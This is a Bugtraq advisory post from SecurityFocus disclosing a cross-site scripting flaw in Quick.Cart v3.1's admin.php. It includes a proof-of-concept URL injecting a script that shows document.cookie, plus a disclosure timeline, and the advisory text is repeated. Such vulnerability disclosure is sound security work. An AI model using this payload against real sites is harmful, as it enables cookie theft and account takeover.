Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
[NOBYTES.COM: #13] Quick.Cart v3.1 Freeware - Cross Site Scripting
Sep 16 2008 09:13PM
John Cobb (johnc nobytes com)
Application: Quick.Cart v3.1 Freeware
Authors Site: http://opensolution.org/quick.cart,en,9.html
+--------------------------------------------------------------+
XSS:
http://www.victim.com/admin.php?"><script>alert(document.cookie)</script
><"
+-[Notes:]-----------------------------------------------------+
This only appears to work on Internet Explorer.
Vulnerabilities found on: 05/09/2008
Author(s) Informed on: 06/09/2008
Author(s) Response: 08/09/2008
Author(s) Fix: None Yet
JohnC (at) NoBytes (dot) com [email concealed]
http://www.NoBytes.com
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
Authors Site: http://opensolution.org/quick.cart,en,9.html
+--------------------------------------------------------------+
XSS:
http://www.victim.com/admin.php?"><script>alert(document.cookie)</script
><"
+-[Notes:]-----------------------------------------------------+
This only appears to work on Internet Explorer.
Vulnerabilities found on: 05/09/2008
Author(s) Informed on: 06/09/2008
Author(s) Response: 08/09/2008
Author(s) Fix: None Yet
JohnC (at) NoBytes (dot) com [email concealed]
http://www.NoBytes.com
[ reply ]